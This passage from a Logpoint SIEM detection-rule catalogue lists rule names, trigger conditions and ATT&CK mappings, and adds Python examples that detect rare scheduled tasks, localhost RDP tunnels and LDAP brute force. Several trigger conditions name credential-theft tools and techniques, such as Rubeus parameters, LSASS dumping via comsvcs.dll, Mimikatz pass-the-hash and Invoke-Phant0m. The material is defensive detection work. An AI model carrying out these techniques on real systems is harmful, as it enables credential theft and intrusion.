Minimum Log Source Requirement: Mail Server
Query:
LP_Possible Insider Threat
Trigger Condition: Logpoint detects alerts like privilege escalation, unauthorized access, and data breach for the same user.
ATT&CK Category: -
ATT&CK Tag: -
ATT&CK ID: -
Minimum Log Source Requirement: Logpoint
Query:
LP_Malicious Payload Download via Office Binaries
Trigger Condition: This alert is triggered whenever an arbitrary file is downloaded using Microsoft Office binaries.
ATT&CK Category: Command and Control
ATT&CK Tag: Ingress Tool Transfer
ATT&CK ID: T1105
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_PowerShell Script Execution from Suspicious Location
Trigger Condition: A command line that invokes a PowerShell script from a suspicious location is detected.
ATT&CK Category: Execution
ATT&CK Tag: PowerShell
ATT&CK ID: T1059.001
Minimum Log Source Requirement: Windows Sysmon, Windows, PowerShell
Query:
LP_Possible Malware Detected
Trigger Condition: A file or software is detected as worm, virus, trojan, or malware.
Minimum Log Source Requirement: Antivirus
Query:
LP_Possible Modification of Boot Configuration
Trigger Condition: Use of the bcdedit command to delete or modify Boot Configuration Data is detected. Boot Configuration Data (BCD) files provide a store that describes boot applications and their settings, and bcdedit is the tool that manipulates that store. Malware and attackers use this to prevent system recovery. Legitimate usage can trigger this alert; we recommend adding legitimate users to the EXCLUDED_USERS list.
ATT&CK Category: Impact, Defense Evasion, Persistence
ATT&CK Tag: Inhibit System Recovery, Pre-OS Boot, Bootkit
ATT&CK ID: T1490, T1542, T1542.003
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Possible Outbound Spamming Detected
Trigger Condition: Mail received from or sent to a domain not included in the KNOWN_DOMAINS list is detected. The KNOWN_DOMAINS list needs to be updated with the domains known to communicate with the organization.
Minimum Log Source Requirement: Mail Server
Query:
LP_Possible Pass the Hash Activity Detected
Trigger Condition: Use of the pass-the-hash technique to move laterally inside the network is detected. Pass the hash authenticates to a system with the password hash rather than the password itself, so adversaries can gain access while bypassing normal authentication controls. Such attacks are hard to detect and prevent because no clear-text password is ever used.
ATT&CK Category: Lateral Movement
ATT&CK Tag: Use Alternate Authentication Material, Pass the Hash
ATT&CK ID: T1550, T1550.002
Minimum Log Source Requirement: Windows
Query:
LP_Possible Privilege Escalation via Weak Service Permissions
Trigger Condition: sc.exe spawned by a user at medium integrity level to change a service's ImagePath or FailureCommand is detected.
ATT&CK Category: Privilege Escalation, Defense Evasion
ATT&CK Tag: Access Token Manipulation
ATT&CK ID: T1134
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Possible Process Hollowing Image Loading
Trigger Condition: Loading of samlib.dll or WinSCard.dll by an untypical process, for example through process hollowing by Mimikatz, is detected.
ATT&CK Category: Defense Evasion, Privilege Escalation
ATT&CK Tag: Hijack Execution Flow, DLL Side-Loading, Process Injection, Process Hollowing
ATT&CK ID: T1574, T1574.002, T1055, T1055.012
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Possible SPN Enumeration Detected
Trigger Condition: Service Principal Name Enumeration used for Steal or Forge Kerberos Tickets and Kerberoasting is detected.
ATT&CK Category: Credential Access
ATT&CK Tag: Steal or Forge Kerberos Tickets, Kerberoasting
ATT&CK ID: T1558, T1558.003
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Possible Taskmgr run as LOCAL_SYSTEM Detected
Trigger Condition: This alert is triggered whenever it detects the creation of taskmgr.exe process in the context of LOCAL_SYSTEM.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Masquerading
ATT&CK ID: T1036
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_PowerShell Base64 Encoded Shellcode Detected
Trigger Condition: Potential Base64 encoded shellcode for PowerShell memory injection is detected.
ATT&CK Category: Defense Evasion, Privilege Escalation
ATT&CK Tag: Process Injection
ATT&CK ID: T1055
Minimum Log Source Requirement: Windows, PowerShell
Query:
LP_PowerShell Network Connections Detected
Trigger Condition: A PowerShell process that opens network connections is detected. We recommend reviewing suspicious target ports and systems and adjusting the filters to your environment, for example by excluding the company's IP range.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter, PowerShell
ATT&CK ID: T1059, T1059.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_PowerShell Profile Modification
Trigger Condition: Modification of a PowerShell profile using the Write-Output or Add-Content command.
ATT&CK Category: Persistence, Privilege Escalation, Execution
ATT&CK Tag: Event Triggered Execution, PowerShell Profile, Command and Scripting Interpreter, PowerShell
ATT&CK ID: T1546, T1546.013, T1059, T1059.001
Minimum Log Source Requirement: Windows, PowerShell
Query:
LP_PowerShell Version Downgrade Detected
Trigger Condition: Execution of legacy PowerShell version 2.
ATT&CK Category: Execution, Defense Evasion
ATT&CK Tag: Command and Scripting Interpreter, PowerShell, Downgrade Attack
ATT&CK ID: T1059, T1059.001, T1562.010
Minimum Log Source Requirement: Windows, PowerShell
Query:
LP_Process Dump via Comsvcs DLL Detected
Trigger Condition: Process memory dump via comsvcs.dll and rundll32 is detected.
ATT&CK Category: Credential Access
ATT&CK Tag: OS Credential Dumping
ATT&CK ID: T1003
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Process Dump via Rundll32 and Comsvcs Detected
Trigger Condition: Process memory dump performed via ordinal function 24 in comsvcs.dll is detected.
ATT&CK Category: Defense Evasion, Credential Access
ATT&CK Tag: Masquerading, OS Credential Dumping, LSASS Memory
ATT&CK ID: T1036, T1003, T1003.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Process Hollowing Detected
Trigger Condition: This alert is triggered whenever process hollowing is detected.
ATT&CK Category: Defense Evasion, Privilege Escalation
ATT&CK Tag: Process Injection, Process Hollowing
ATT&CK ID: T1055, T1055.012
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Process Injection Detected
Trigger Condition: Code injection into a process, for example via the Invoke-DllInjection command, is detected. Adversaries inject code to evade process-based defenses and possibly elevate privileges.
ATT&CK Category: Defense Evasion, Privilege Escalation
ATT&CK Tag: Process Injection
ATT&CK ID: T1055
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Protected Storage Service Access Detected
Trigger Condition: Access to the protected_storage service over the network is detected, indicating potential abuse of DPAPI to extract domain backup keys from domain controllers.
ATT&CK Category: Lateral Movement
ATT&CK Tag: Remote Services
ATT&CK ID: T1021
Minimum Log Source Requirement: Windows
Query:
LP_Psr Capture Screenshots Detected
Trigger Condition: This alert is triggered when the psr utility is used to take screen captures of the desktop, which adversaries do to gather information over the course of an operation.
ATT&CK Category: Collection
ATT&CK Tag: Screen Capture
ATT&CK ID: T1113
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Query Registry Network
Trigger Condition: A network connection made by reg.exe is detected. Adversaries use reg.exe to interact with the Windows Registry, including on remote systems, to gather information about the system, its configuration, and installed software.
ATT&CK Category: Discovery
ATT&CK Tag: Query Registry
ATT&CK ID: T1012
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Rare Scheduled Task Creations Detected
Trigger Condition: Rarely seen scheduled task creations are detected. Software installed across many systems creates a task with the same name on each of them; the aggregation and count function selects task names that occur only rarely.
ATT&CK Category: Persistence
ATT&CK Tag: Scheduled Task/Job, Scheduled Task
ATT&CK ID: T1053, T1053.005
Minimum Log Source Requirement: Windows Sysmon
Query:
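Worked example, added here and not part of Logpoint's rule set: the aggregate-and-count step of the rule above, written in Python over constructed task-creation records (host plus task name, as found in Security Event ID 4698 or a schtasks.exe command line). It goes one step beyond the rule text by normalising SIDs and GUIDs out of task names before counting, since per-user and per-install tasks would otherwise all look rare. The host names, task names and threshold are assumptions for the example.

```python
# Added example (not Logpoint's query): rarity-based selection of scheduled
# task names. Events are constructed samples with two fields: Computer and
# TaskName.
import re
from collections import defaultdict

# Per-user or per-install tasks embed SIDs and GUIDs in their names, so the
# same software looks like a different task on every host. Normalise those
# away before counting, otherwise everything legitimate looks "rare".
_SID = re.compile(r"S-1-5-21(?:-\d+){3,4}", re.IGNORECASE)
_GUID = re.compile(
    r"\{?[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\}?",
    re.IGNORECASE)


def normalise_task_name(name: str) -> str:
    name = name.strip().lower()          # task paths are case-insensitive
    name = _SID.sub("<sid>", name)
    return _GUID.sub("<guid>", name)


def rare_tasks(events, max_hosts=1):
    """Map each rarely seen (normalised) task name to the hosts that created it.
    A task is "rare" when it was created on at most `max_hosts` distinct hosts."""
    hosts_by_task = defaultdict(set)
    for ev in events:
        hosts_by_task[normalise_task_name(ev["TaskName"])].add(ev["Computer"])
    return {task: sorted(hosts) for task, hosts in hosts_by_task.items()
            if len(hosts) <= max_hosts}


# Constructed sample: one fleet-wide task, two per-user/per-install tasks with
# varying identifiers, and a single one-off task that should surface.
SAMPLE_EVENTS = [
    {"Computer": "ws-01", "TaskName": r"\Microsoft\Windows\UpdateOrchestrator\Schedule Scan"},
    {"Computer": "ws-02", "TaskName": r"\Microsoft\Windows\UpdateOrchestrator\Schedule Scan"},
    {"Computer": "ws-03", "TaskName": r"\Microsoft\Windows\UpdateOrchestrator\Schedule Scan"},
    {"Computer": "ws-01", "TaskName": r"\OneDrive Standalone Update Task-S-1-5-21-1111-2222-3333-1001"},
    {"Computer": "ws-02", "TaskName": r"\OneDrive Standalone Update Task-S-1-5-21-1111-2222-3333-1002"},
    {"Computer": "ws-01", "TaskName": r"\GoogleUpdateTaskMachineUA{0A1B2C3D-4E5F-6071-8293-A4B5C6D7E8F9}"},
    {"Computer": "ws-03", "TaskName": r"\GoogleUpdateTaskMachineUA{F9E8D7C6-B5A4-9382-7160-5F4E3D2C1B0A}"},
    {"Computer": "ws-03", "TaskName": r"\Updater"},
]

if __name__ == "__main__":
    for task, hosts in rare_tasks(SAMPLE_EVENTS).items():
        print(f"{task}  seen on {len(hosts)} host(s): {', '.join(hosts)}")
```

Raise max_hosts for larger fleets; the point is that the OneDrive and Google Update tasks collapse to one name each and drop out, leaving only the one-off \Updater task.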
LP_RDP Login from Localhost Detected
Trigger Condition: RDP login with a localhost source address that may be a tunneled login is detected.
ATT&CK Category: Lateral Movement
ATT&CK Tag: Remote Services, Remote Desktop Protocol
ATT&CK ID: T1021, T1021.001
Minimum Log Source Requirement: Windows
Query:
LP_RDP Over Reverse SSH Tunnel Detected
Trigger Condition: svchost.exe hosting the RDP service (termsvcs) communicating with the loopback address on TCP port 3389 is detected.
ATT&CK Category: Lateral Movement, Command and Control
ATT&CK Tag: Remote Services, Remote Desktop Protocol, Protocol Tunneling
ATT&CK ID: T1021, T1021.001, T1572
Minimum Log Source Requirement: Windows Sysmon
Query:
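Worked example, added here and not part of Logpoint's rule set: the two localhost-RDP rules above (RDP Login from Localhost and RDP Over Reverse SSH Tunnel) as detection logic in Python over constructed Sysmon Event ID 3 and Security Event ID 4624 records. Field names follow the Sysmon and Windows Security schemas; the sample events, host name, addresses and ports are made up for the example.

```python
# Added example (not Logpoint's query): flag RDP sessions whose peer is the
# loopback interface, from two sources at once:
#   - Sysmon Event ID 3 (network connection) for svchost.exe on TCP/3389
#   - Security Event ID 4624 (logon) with LogonType 10 from 127.0.0.1 / ::1
# The event dictionaries below are constructed samples, not captured logs.
import ipaddress

RDP_PORT = 3389
REMOTE_INTERACTIVE = 10  # 4624 LogonType for RDP


def is_loopback(addr: str) -> bool:
    """127.0.0.0/8 or ::1. Strip a possible IPv6 zone index such as '::1%1'."""
    try:
        return ipaddress.ip_address(addr.split("%", 1)[0]).is_loopback
    except ValueError:
        return False


def sysmon_rdp_over_loopback(ev: dict) -> bool:
    """svchost.exe talking TCP/3389 with both endpoints on loopback.
    Sysmon's Source/Destination orientation for accepted connections is easy
    to get wrong, so 3389 is matched on either side. With a reverse SSH
    tunnel the other peer is the local ssh process, not a remote host."""
    if ev.get("EventID") != 3 or ev.get("Protocol", "").lower() != "tcp":
        return False
    if not ev.get("Image", "").lower().endswith("\\svchost.exe"):
        return False
    ports = {int(ev.get("SourcePort", 0)), int(ev.get("DestinationPort", 0))}
    return (RDP_PORT in ports
            and is_loopback(ev.get("SourceIp", ""))
            and is_loopback(ev.get("DestinationIp", "")))


def security_rdp_from_localhost(ev: dict) -> bool:
    """4624 RemoteInteractive logon whose source address is loopback."""
    return (ev.get("EventID") == 4624
            and int(ev.get("LogonType", 0)) == REMOTE_INTERACTIVE
            and is_loopback(ev.get("IpAddress", "")))


def detect(events):
    """Return (rule, host, detail) tuples for every matching event."""
    hits = []
    for ev in events:
        if sysmon_rdp_over_loopback(ev):
            hits.append(("RDP Over Reverse SSH Tunnel", ev["Computer"],
                         f"{ev['SourceIp']}:{ev['SourcePort']} -> "
                         f"{ev['DestinationIp']}:{ev['DestinationPort']}"))
        elif security_rdp_from_localhost(ev):
            hits.append(("RDP Login from Localhost", ev["Computer"],
                         f"{ev['TargetDomainName']}\\{ev['TargetUserName']}"))
    return hits


# Constructed sample events (assumed shapes, not captured logs).
SAMPLE_EVENTS = [
    {"EventID": 3, "Computer": "srv-01", "Image": r"C:\Windows\System32\svchost.exe",
     "Protocol": "tcp", "Initiated": "true", "SourceIp": "127.0.0.1",
     "SourcePort": 3389, "DestinationIp": "127.0.0.1", "DestinationPort": 49812},
    {"EventID": 3, "Computer": "srv-01", "Image": r"C:\Windows\System32\svchost.exe",
     "Protocol": "tcp", "Initiated": "true", "SourceIp": "10.0.0.5",
     "SourcePort": 52211, "DestinationIp": "10.0.0.9", "DestinationPort": 443},
    {"EventID": 4624, "Computer": "srv-01", "LogonType": 10, "IpAddress": "::1",
     "TargetDomainName": "CORP", "TargetUserName": "admin"},
    {"EventID": 4624, "Computer": "srv-01", "LogonType": 10, "IpAddress": "10.1.2.3",
     "TargetDomainName": "CORP", "TargetUserName": "jdoe"},
    {"EventID": 4624, "Computer": "srv-01", "LogonType": 3, "IpAddress": "127.0.0.1",
     "TargetDomainName": "CORP", "TargetUserName": "svc_backup"},
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(*hit, sep=" | ")
```

The Security-log check is the more reliable of the two: a LogonType 10 logon can only come from loopback if something on the host is forwarding the RDP port. The Sysmon check also catches tunnels that never complete a logon, at the cost of needing Image and port filters that depend on the Sysmon configuration.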
LP_RDP Registry Modification
Trigger Condition: This alert is triggered whenever Remote Desktop Protocol (RDP) registry keys are modified to enable RDP.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Modify Registry
ATT&CK ID: T1112
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_RDP Sensitive Settings Changed
Trigger Condition: Changes to registry keys related to the RDP terminal service are detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Modify Registry
ATT&CK ID: T1112
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Reconnaissance Activity with Net Command
Trigger Condition: A set of commands often used in recon stages by different attack groups to discover the victim’s information, systems, or network are detected.
ATT&CK Category: Discovery, Reconnaissance
ATT&CK Tag: Account Discovery, System Information Discovery, Gather Victim Host Information, Gather Victim Identity Information
ATT&CK ID: T1087, T1082, T1589, T1592
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_RedSocks Backdoor Connection
Trigger Condition: A backdoor event is detected. Adversaries develop malware and malware components such as backdoors for use during targeting.
ATT&CK Category: Resource Development
ATT&CK Tag: Develop Capabilities, Malware
ATT&CK ID: T1587, T1587.001
Minimum Log Source Requirement: Redsocks
Query:
LP_RedSocks Bad Neighborhood Detection
Trigger Condition: A bad neighborhood connection is detected. Adversaries use a connection proxy to direct network traffic between systems or to act as an intermediary for communications with a Command and Control server, avoiding direct connections to their infrastructure.
ATT&CK Category: Impact
ATT&CK Tag: Proxy
ATT&CK ID: T1090
Minimum Log Source Requirement: Redsocks
Query:
LP_RedSocks Blacklist URL Detection
Trigger Condition: Blacklist URLs are detected.
Minimum Log Source Requirement: Redsocks
Query:
LP_RedSocks FileSharing
Trigger Condition: Filesharing using an alternate platform like 4Shared, FileHippo, Torrent, Picofile, or WeTransfer is detected.
ATT&CK Category: Exfiltration
ATT&CK Tag: Exfiltration over Alternative Protocol
ATT&CK ID: T1048
Minimum Log Source Requirement: Redsocks
Query:
LP_RedSocks Ransomware Connection
Trigger Condition: A ransomware event is detected.
ATT&CK Category: Impact
ATT&CK Tag: Disk Wipe, Disk Content Wipe, Data Encrypted for Impact, Data Destruction, Proxy
ATT&CK ID: T1561, T1561.001, T1486, T1485, T1090
Minimum Log Source Requirement: Redsocks
Query:
LP_RedSocks Sinkhole Detection
Trigger Condition: A connection to a sinkholed destination is detected.
ATT&CK Category: Impact
Minimum Log Source Requirement: Redsocks
Query:
LP_RedSocks Tor Connection
Trigger Condition: A Tor connection is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Proxy
ATT&CK ID: T1090
Minimum Log Source Requirement: Redsocks
Query:
LP_RedSocks Trojan Connection
Trigger Condition: A trojan event is detected.
Minimum Log Source Requirement: Redsocks
Query:
LP_Register new Logon Process by Rubeus
Trigger Condition: Potential use of Rubeus is detected through the registration of a new trusted logon process. Adversaries abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to brute force.
ATT&CK Category: Lateral Movement, Privilege Escalation
ATT&CK Tag: Steal or Forge Kerberos Tickets, Kerberoasting
ATT&CK ID: T1558, T1558.003
Minimum Log Source Requirement: Windows
Query:
LP_Registry Persistence Mechanisms Detected
Trigger Condition: Persistence registry keys under the CurrentVersion path are detected. Adversaries establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers.
ATT&CK Category: Privilege Escalation, Persistence
ATT&CK Tag: Event Triggered Execution, Image File Execution Options Injection
ATT&CK ID: T1546, T1546.012
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Regsvcs-Regasm Detected
Trigger Condition: Adversaries abuse the trusted Windows command-line utilities regsvcs and regasm for proxy execution of code.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Signed Binary Proxy Execution, Regsvcs/Regasm
ATT&CK ID: T1218, T1218.009
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Remote PowerShell Session
Trigger Condition: Remote PowerShell sessions on endpoints are detected. PowerShell remoting allows code to be executed on a remote system without using RDP.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter, PowerShell
ATT&CK ID: T1059, T1059.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Remote System Discovery
Trigger Condition: Built-in tools such as net.exe and ping.exe are used to list other systems on the network by IP address, hostname, or other logical identifiers, information that is then used for lateral movement from the current system.
ATT&CK Category: Discovery
ATT&CK Tag: Remote System Discovery
ATT&CK ID: T1018
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Renamed Binary Detected
Trigger Condition: This alert is triggered whenever it detects the execution of a renamed binary.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Rename System Utilities
ATT&CK ID: T1036.003
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Renamed PsExec Detected
Trigger Condition: Execution of a renamed PsExec, as used by attackers or malware, is detected.
ATT&CK Category: Execution
ATT&CK Tag: Masquerading
ATT&CK ID: T1036
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Rogue Access Point Detected
Trigger Condition: A rogue access point is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Exploitation for Defense Evasion, Software Discovery, Security Software Discovery
ATT&CK ID: T1211, T1518, T1518.001
Minimum Log Source Requirement: Firewall, IDS, IPS
Query:
LP_RSA SecurID Account Lockout
Trigger Condition: User’s account is locked after entering the wrong passcode multiple times in a row.
ATT&CK Category: Credential Access
ATT&CK Tag: Brute Force
ATT&CK ID: T1110
Minimum Log Source Requirement: RSA SecurID
Query:
LP_Rubeus Hack Tool Detected
Trigger Condition: This alert is triggered whenever it detects command-line parameters such as asreproast, dump, impersonateuser, harvest, and other commands used by the Rubeus hack tool. Rubeus is a popular command-line tool used by attackers to perform Kerberos-related credential access attacks, such as Kerberoasting, in Windows environments.
ATT&CK Category: Credential Access
ATT&CK Tag: OS Credential Dumping
ATT&CK ID: T1003
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_SCM Database Handle Failure Detected
Trigger Condition: A non-system user fails to obtain a handle to the SCM database.
ATT&CK Category: Impact
ATT&CK Tag: Endpoint Denial of Service
ATT&CK ID: T1499
Minimum Log Source Requirement: Windows
Query:
LP_SCM Database Privileged Operation Detected
Trigger Condition: A non-system user performs a privileged operation on the SCM database.
ATT&CK Category: Privilege Escalation
ATT&CK Tag: Abuse Elevation Control Mechanism, Bypass User Account Control
ATT&CK ID: T1548, T1548.002
Minimum Log Source Requirement: Windows
Query:
LP_Secure Deletion with SDelete
Trigger Condition: Renaming of a file during deletion by the SDelete tool is detected.
ATT&CK Category: Defense Evasion, Impact
ATT&CK Tag: Indicator Removal on Host, File Deletion, Obfuscated Files or Information, Indicator Removal from Tools, Data Destruction, Subvert Trust Controls, Code Signing
ATT&CK ID: T1070, T1070.004, T1027, T1027.005, T1485, T1553, T1553.002
Minimum Log Source Requirement: Windows
Query:
LP_SecurityXploded Tool Detected
Trigger Condition: Execution of SecurityXploded tools is detected. Adversaries abuse these tools for credential access or other malicious purposes.
ATT&CK Category: Credential Access
ATT&CK Tag: Credentials from Password Stores
ATT&CK ID: T1555
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_smbexec Service Installation Detected
Trigger Condition: A service installation characteristic of the smbexec.py tool is detected.
ATT&CK Category: Lateral Movement, Execution
ATT&CK Tag: SMB/Windows Admin Shares, Service Execution
ATT&CK ID: T1021.002, T1569.002
Minimum Log Source Requirement: Windows
Query:
LP_SolarisLDAP Group Remove from LDAP Detected
Trigger Condition: The removal of a group from LDAP is detected.
ATT&CK Category: Credential Access, Persistence, Impact, Defense Evasion
ATT&CK Tag: Account Manipulation, Account Access Removal
ATT&CK ID: T1098, T1531
Minimum Log Source Requirement: Solaris LDAP
Query:
LP_SolarisLDAP Password Spraying Attack Detected
Trigger Condition: Multiple failed login or authentication attempts on Solaris LDAP from various users are detected. Adversaries can try a list of commonly used passwords against many different accounts to obtain valid account credentials.
ATT&CK Category: -
ATT&CK Tag: -
ATT&CK ID: -
Minimum Log Source Requirement: Solaris LDAP
Query:
LP_SolarisLDAP Possible Bruteforce Attack Detected
Trigger Condition: Five failed Solaris LDAP login or authentication attempts by the same user are detected. Adversaries perform brute force attacks to find a user's valid credentials. The failure count needs to be adjusted to the environment.
ATT&CK Category: Credential Access
ATT&CK Tag: Brute Force
ATT&CK ID: T1110
Minimum Log Source Requirement: Solaris LDAP
Query:
LP_SolarisLDAP Successful Bruteforce Attack Detected
Trigger Condition: A successful login following the number of failed logins defined in the query is detected. Adversaries perform brute-force attacks to discover and validate credentials and gain access to systems and the network. The failure count needs to be adjusted to the environment.
ATT&CK Category: Initial Access, Persistence, Privilege Escalation, Defense Evasion, Credential Access
ATT&CK Tag: Valid Accounts, Account Manipulation, Brute Force, Forced Authentication
ATT&CK ID: T1078, T1098, T1110, T1187
Minimum Log Source Requirement: Solaris LDAP
Query:
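Worked example, added here and not part of Logpoint's rule set: the failure-count correlation behind LP_SolarisLDAP Possible Bruteforce Attack Detected and the failures-then-success correlation behind LP_SolarisLDAP Successful Bruteforce Attack Detected, implemented in Python as a sliding time window per account. The log lines are constructed in a simplified "timestamp user result source" layout, not the real Solaris LDAP format, and THRESHOLD and WINDOW_SECONDS are the tuning values the rules say must be adjusted to the environment.

```python
# Added example (not Logpoint's query): per-user sliding-window correlation
# of failed authentications, with a second alert when a success arrives
# while enough failures are still inside the window.
from collections import defaultdict, deque
from datetime import datetime, timedelta

THRESHOLD = 5          # failed attempts before the account is reported
WINDOW_SECONDS = 600   # failures older than this are forgotten


def parse_line(line: str):
    """'<ISO timestamp> <user> <FAIL|SUCCESS> <source ip>' -> tuple (constructed layout)."""
    ts, user, result, src = line.split()
    return datetime.fromisoformat(ts), user, result, src


def correlate(lines, threshold=THRESHOLD, window_seconds=WINDOW_SECONDS):
    """Return (possible_bruteforce, successful_bruteforce) alert lists.

    possible_bruteforce   : user reached `threshold` failures inside the window
    successful_bruteforce : a success arrived while >= threshold failures were
                            still inside the window
    Lines are processed in timestamp order regardless of input order."""
    window = timedelta(seconds=window_seconds)
    failures = defaultdict(deque)          # user -> timestamps of recent failures
    possible, successful, reported = [], [], set()
    for ts, user, result, src in sorted(parse_line(l) for l in lines):
        q = failures[user]
        while q and ts - q[0] > window:    # expire failures outside the window
            q.popleft()
        if result == "FAIL":
            q.append(ts)
            if len(q) >= threshold and user not in reported:
                possible.append({"user": user, "failures": len(q), "source": src})
                reported.add(user)         # report each streak once
        elif result == "SUCCESS":
            if len(q) >= threshold:
                successful.append({"user": user, "failures": len(q),
                                   "source": src, "time": ts.isoformat()})
            q.clear()                      # a success ends the streak
            reported.discard(user)
    return possible, successful


# Constructed sample log: alice is brute-forced and then compromised,
# bob mistypes twice, carol is being hammered but has not fallen yet.
SAMPLE_LOG = [
    "2024-05-01T10:00:00 alice FAIL 203.0.113.7",
    "2024-05-01T10:00:05 alice FAIL 203.0.113.7",
    "2024-05-01T10:00:10 alice FAIL 203.0.113.7",
    "2024-05-01T10:00:15 alice FAIL 203.0.113.7",
    "2024-05-01T10:00:20 alice FAIL 203.0.113.7",
    "2024-05-01T10:00:25 alice SUCCESS 203.0.113.7",
    "2024-05-01T10:01:00 bob FAIL 10.0.0.12",
    "2024-05-01T10:01:30 bob FAIL 10.0.0.12",
    "2024-05-01T10:02:00 bob SUCCESS 10.0.0.12",
] + [f"2024-05-01T10:05:{i:02d} carol FAIL 198.51.100.9" for i in range(6)]

if __name__ == "__main__":
    possible, successful = correlate(SAMPLE_LOG)
    print("possible bruteforce :", possible)
    print("successful bruteforce:", successful)
```

Keying the window on the user alone is what the Solaris LDAP rules describe; for the password-spraying case the same loop is keyed on the source address instead, so many different users with one failure each add up.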
LP_SolarisLDAP User Account Lockout Detected
Trigger Condition: A locked user account is detected.
ATT&CK Category: Defense Evasion, Persistence, Privilege Escalation, Initial Access
ATT&CK Tag: Valid Accounts, Abuse Elevation Control Mechanism, Bypass User Account Control
ATT&CK ID: T1078, T1548
Minimum Log Source Requirement: Solaris LDAP
Query:
LP_Sophos XG Firewall - Inbound Attack Detected by IDP
Trigger Condition: An inbound attack defined in IDP policy is detected.
ATT&CK Category: Impact
ATT&CK Tag: Network Denial of Service, Endpoint Denial of Service
ATT&CK ID: T1498, T1499
Minimum Log Source Requirement: Sophos XG Firewall
Query:
LP_Sophos XG Firewall - Outbound Attack Detected by IDP
Trigger Condition: An outbound attack defined in IDP policy is detected.
ATT&CK Category: Impact
ATT&CK Tag: Network Denial of Service, Endpoint Denial of Service
ATT&CK ID: T1498, T1499
Minimum Log Source Requirement: Sophos XG Firewall
Query:
LP_SophosUTM Policy Violation
Trigger Condition: Multiple policy violations from one source are detected. For this alert to work, the following lists must be populated:
EXTREMIST_CONTENT, for example, weapons.
CONCERNED_CONTENT, for example, alcohol, tobacco, gambling, and so on.
CRIMINAL_CONTENT, for example, hacking, drugs, and so on.
VULNERABLE_CONTENT, for example, abuse, and so on.
ATT&CK Category: Defense Evasion, Privilege Escalation, Credential Access
ATT&CK Tag: Abuse Elevation Control Mechanism, Bypass User Account Control, Group Policy Modification, Exploitation for Credential Access, Exploitation for Privilege Escalation
ATT&CK ID: T1548, T1484, T1212, T1068
Minimum Log Source Requirement: Sophos UTM
Query:
LP_SSHD Connection Denied
Trigger Condition: Ten denied connections are detected from the same source.
ATT&CK Category: Lateral Movement, Command and Control, Impact
ATT&CK Tag: Remote Services, Commonly Used Port, Network Denial of Service, Endpoint Denial of Service
ATT&CK ID: T1021, T1498, T1499
Minimum Log Source Requirement: Firewall, IDS, IPS
Query:
LP_Stealthy Scheduled Task Creation via VBA Macro Detected
Trigger Condition: Office products such as Word, Excel, PowerPoint, and Outlook load taskschd.dll, the Task Scheduler COM library through which a VBA macro can create a scheduled task without spawning schtasks.exe.
ATT&CK Category: Execution, Persistence, Privilege Escalation
ATT&CK Tag: Scheduled Task/Job, Scheduled Task
ATT&CK ID: T1053, T1053.005
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Sticky Key Like Backdoor Usage Detected
Trigger Condition: This alert is triggered upon detecting the use or installation of a backdoor that registers a malicious debugger for the accessibility tools reachable from the login screen, such as sethc.exe (Sticky Keys).
ATT&CK Category: Privilege Escalation, Persistence
ATT&CK Tag: Event Triggered Execution, Accessibility Features
ATT&CK ID: T1546, T1546.008
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Stop Windows Service Detected
Trigger Condition: A Windows service is stopped.
ATT&CK Category: Impact
ATT&CK Tag: Service Stop
ATT&CK ID: T1489
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Successful Lateral Movement to Administrator via Pass the Hash using Mimikatz Detected
Trigger Condition: This alert is triggered whenever lateral movement using the pass-the-hash method succeeds in accessing an administrator account.
ATT&CK Category: Lateral Movement
ATT&CK Tag: Use Alternate Authentication Material, Pass the Hash
ATT&CK ID: T1550, T1550.002
Minimum Log Source Requirement: Windows
Query:
LP_Successful Overpass the Hash Attempt
Trigger Condition: A successful overpass-the-hash attempt is detected. The attack combines pass-the-hash and pass-the-ticket: the NTLM hash is used to obtain a Kerberos ticket instead of being replayed over NTLM. Adversaries use this technique when a cleartext password cannot be obtained but Kerberos authentication can be used to access the target system.
ATT&CK Category: Lateral Movement
ATT&CK Tag: Pass the Hash
ATT&CK ID: T1550.002
Minimum Log Source Requirement: Windows
Query:
LP_Suspect Svchost Memory Access
Trigger Condition: Suspicious access to svchost.exe process memory is detected, such as that performed by Invoke-Phant0m to kill the threads of the Windows Event Log service. svchost.exe is a legitimate system process that hosts multiple Windows services, and adversaries tamper with it to disable logging or to run malicious code under its cover.
